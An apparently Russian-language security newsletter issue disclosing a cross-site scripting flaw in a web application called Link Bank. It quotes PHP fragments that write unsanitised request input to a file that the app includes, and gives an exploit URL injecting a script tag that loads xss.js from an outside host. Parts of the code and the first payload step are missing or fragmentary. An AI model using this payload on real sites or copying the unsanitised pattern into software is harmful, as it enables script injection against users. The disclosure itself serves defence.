Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Link Bank.


Компьютер для продвинутых пользователей
Содержание:
Link Bank
ПО: Link Bank
Версия: n\a

Уязвимость:
Link Bank не санирует отправленные сообщения, что позволяет пользователю вставить информацию, которую можно использовать в атакующих действиях. После отправки информация переходит в текстовой файл с расширением .txt, которые приложение читает и выполняет в виде ссылки. Этот недочет позволяет проводить xss атаки.
В ./content/index.txt
include("links.txt"); ?> В ./content/add_link.txt:
$url_name = $_REQUEST['url_name']; $url = $_REQUEST['url']; $img = $_REQUEST['img']; $filename = "content/links.txt"; $code = "$url_name";
В ./iframe.php
Link Bank -
Использование:
1. Отправляем некоторый код, например .
2. XSS: http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E
Link Bank
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

В избранное